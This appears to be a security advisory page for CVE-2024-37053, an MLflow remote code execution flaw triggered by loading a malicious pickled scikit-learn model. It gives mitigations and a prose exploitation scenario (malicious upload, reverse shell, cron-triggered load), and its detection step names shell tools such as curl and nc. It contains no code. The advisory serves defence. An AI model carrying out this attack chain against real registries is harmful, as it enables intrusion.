CVE-2024-37053: MLflow: RCE via malicious scikit-learn model deserialization
HIGH PoC AVAILABLEAny MLflow deployment where untrusted users can upload models is a full RCE vector — no authentication needed to upload, just get a victim to load the model. Audit who has write access to your MLflow model registry immediately and enforce model signing or allowlisting before loading external artifacts. If your data science teams pull models from shared or public registries without verification, assume compromise risk is active.
Risk Assessment
High risk for organizations running MLflow with open or loosely controlled model upload permissions. CVSS 8.8 reflects the realistic scenario: low attack complexity, no attacker privileges required, and complete CIA triad impact once triggered. The user interaction requirement (someone loading the model) is trivially satisfied in normal ML workflows where engineers routinely load models from the registry. Exposure is amplified in multi-tenant MLflow deployments, shared experiment environments, and CI/CD pipelines that auto-load models for evaluation.
Affected Systems
| Package | Ecosystem | Vulnerable Range | Patched |
|---|---|---|---|
| mlflow | pip | — | No patch |
Do you use mlflow? You're affected.
Severity & Risk
Attack Surface
Recommended Action
7 steps-
PATCH
Update MLflow to the latest patched version immediately (check HiddenLayer advisory for exact versions).
-
ACCESS CONTROL
Restrict model upload permissions to authenticated, authorized users only — enforce RBAC on MLflow server.
-
MODEL SIGNING
Implement model signing and verification before any load_model() call in pipelines.
-
NETWORK ISOLATION
Run MLflow behind VPN/internal network only; no public-facing exposure.
-
DETECTION
Monitor for unexpected process spawning from Python interpreter processes that loaded MLflow models (e.g., curl, bash, nc, reverse shells). Set up EDR alerts on pickle deserialization patterns.
-
WORKAROUND (if unpatched): Scan model files with tools like fickling (Trail of Bits) to detect malicious pickle payloads before loading.
-
AUDIT
Review MLflow audit logs for unexpected model uploads, especially from new or external accounts.
CISA SSVC Assessment
Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.
Classification
Compliance Impact
This CVE is relevant to:
Frequently Asked Questions
What is CVE-2024-37053?
Any MLflow deployment where untrusted users can upload models is a full RCE vector — no authentication needed to upload, just get a victim to load the model. Audit who has write access to your MLflow model registry immediately and enforce model signing or allowlisting before loading external artifacts. If your data science teams pull models from shared or public registries without verification, assume compromise risk is active.
Is CVE-2024-37053 actively exploited?
Proof-of-concept exploit code is publicly available for CVE-2024-37053, increasing the risk of exploitation.
How to fix CVE-2024-37053?
1. PATCH: Update MLflow to the latest patched version immediately (check HiddenLayer advisory for exact versions). 2. ACCESS CONTROL: Restrict model upload permissions to authenticated, authorized users only — enforce RBAC on MLflow server. 3. MODEL SIGNING: Implement model signing and verification before any load_model() call in pipelines. 4. NETWORK ISOLATION: Run MLflow behind VPN/internal network only; no public-facing exposure. 5. DETECTION: Monitor for unexpected process spawning from Python interpreter processes that loaded MLflow models (e.g., curl, bash, nc, reverse shells). Set up EDR alerts on pickle deserialization patterns. 6. WORKAROUND (if unpatched): Scan model files with tools like fickling (Trail of Bits) to detect malicious pickle payloads before loading. 7. AUDIT: Review MLflow audit logs for unexpected model uploads, especially from new or external accounts.
What systems are affected by CVE-2024-37053?
This vulnerability affects the following AI/ML architecture patterns: Model registries, ML experiment tracking platforms, Training pipelines, MLOps CI/CD pipelines, Model serving (evaluation phase).
What is the CVSS score for CVE-2024-37053?
CVE-2024-37053 has a CVSS v3.1 base score of 8.8 (HIGH). The EPSS exploitation probability is 0.44%.
Technical Details
NVD Description
Deserialization of untrusted data can occur in versions of the MLflow platform running version 1.1.0 or newer, enabling a maliciously uploaded scikit-learn model to run arbitrary code on an end user’s system when interacted with.
Exploitation Scenario
Adversary identifies an organization's MLflow instance (often exposed internally, sometimes publicly). Without requiring existing credentials (PR:N), they register a malicious scikit-learn model file containing a crafted pickle payload — trivially generated with publicly available tools. The payload establishes a reverse shell or downloads a second-stage implant. The adversary then waits or socially engineers a team member to run an evaluation script, trigger a CI/CD pipeline that auto-evaluates new models, or simply browse the experiment in the MLflow UI — any of which calls load_model() and triggers execution. In automated MLOps pipelines, exploitation is fully silent: upload model, wait for the next evaluation cron job, receive shell.
Weaknesses (CWE)
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H References
- hiddenlayer.com/sai-security-advisory/mlflow-june2024 Exploit 3rd Party
Timeline
Related Vulnerabilities
CVE-2025-15379 10.0 MLflow: RCE via unsanitized model dependency specs
Same package: mlflow CVE-2023-3765 10.0 MLflow: path traversal allows arbitrary file read
Same package: mlflow CVE-2026-2635 9.8 mlflow: security flaw enables exploitation
Same package: mlflow CVE-2023-2780 9.8 MLflow: path traversal allows arbitrary file read/write
Same package: mlflow CVE-2023-1177 9.8 MLflow: path traversal allows arbitrary file read/write
Same package: mlflow
AI Threat Alert